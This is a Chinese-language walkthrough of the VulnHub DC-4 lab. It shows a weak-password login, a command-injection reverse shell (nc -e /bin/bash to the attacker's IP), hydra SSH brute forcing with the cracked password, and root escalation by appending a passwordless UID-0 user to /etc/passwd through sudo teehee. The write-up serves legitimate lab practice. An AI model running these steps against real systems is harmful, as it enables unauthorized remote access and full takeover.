# 前言

继续这个系列的第四篇,这篇很简单,上来就 rce 了,不过提权稍微有点套娃

# 环境搭建

地址:DC: 4 ~ VulnHub

使用 VMware 搭建环境(这个参考这个系列的第一篇即可 DC-1 - Vulnhub | Clown の Blog = (xcu.icu),环境搭建都一样,这里我还是将网络模式改为了 nat)

这里有两点值得注意的地方我还是写一下(如果存在的话)

# VMware Workstation 不可恢复错误:(vmui)

将硬件兼容性改为 16 即可

image-20231021163425624

选择更改此虚拟机

image-20231021163538809

加载完成就可以了

# IDE 设备 (磁盘 / CD-ROM) 配置不正确

image-20231021162811684

解决方法也很简单,根据报错提示改一下就可以了点 “虚拟机”->“设置”-> 选择 “磁盘 / 光驱 IDE 设备 " -> 点 ” 高级 “

image-20231021163023484

image-20231021163046316

将这里改为 IDE 0::0 就可以了

# 打靶流程

首先还是进行主机发现

image-20231113221431083

然后进行端口扫描

image-20231113221447468

然后进行协议发现

image-20231113221336993

这里可以看到开放了两个端口,22 端口是 OpenSSH 7.4 Debian,80 端口是 Nginx 1.15.10

这里先去看一下 80 端口上面的服务

image-20231113221646030

这里开放了一个 web 页面,是一个登录的功能,这里先测试一下 sql

image-20231113222105346

发现这里应该是没有 sql 注入,然后尝试一下弱口令,这里使用的是 john 的字典,位于 /usr/share/john/password.lst

image-20231113222450900

这里可以看到使用 happy 能登录成功

image-20231113222607857

这里可以看到,这里执行一些命令,还是抓包,这里直接去尝试反弹 shell

image-20231113223342761

radio=nc 192.168.246.129 6699 -e /bin/bash&submit=Run

本地起一个监听端口

image-20231113223420356

这里当前的权限是 www-data,然后本来想要查看 sudo -l 配置信息,发现要密码,这里进到 home 目录

image-20231113223531341

这里可以看到有三个用户,这里进入到 jim 目录

image-20231113223634560

这个文件没有什么有用的信息,然后这里看一下 backups 目录下,这里有一个 old-passwords.bak,很显然这是一个密码的备份文件,这里尝试用这个密码登录这个 jim 用户

image-20231113223755669

这里将这个密码复制出来到 kali 中

hydra -l jim -P ./password.txt  ssh://192.168.246.149

image-20231113224153447

这里可以看到密码就已经爆破出来了,然后登录这个密码

[22][ssh] host: 192.168.246.149   login: jim   password: jibril04

image-20231113224414366

这里尝试 ssh 连接,这里看到提示有 mail,然后这里找一下

find / -name "mail"

image-20231113224540552

这里看到有两个 mail,这里去看一下

image-20231113224638077

这里看到是 charles 发给 jim,而且这里还给了密码,这里直接尝试去登录

image-20231113224825263

这里可以看到这里存在一个 root 权限免密码执行 /usr/bin/teehee

这个命令是一个文件内容追加的作用,这里直接添加文件内容到 /etc/passwd

echo "clown::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
参数解释
#如:admin:x:0:0::/home/admin:/bin/bash
#[用户名]:[密码]:[UID]:[GID]:[身份描述]:[主目录]:[登录shell]
"-a" 选项的作用等同于 ">>" 命令

image-20231113230259388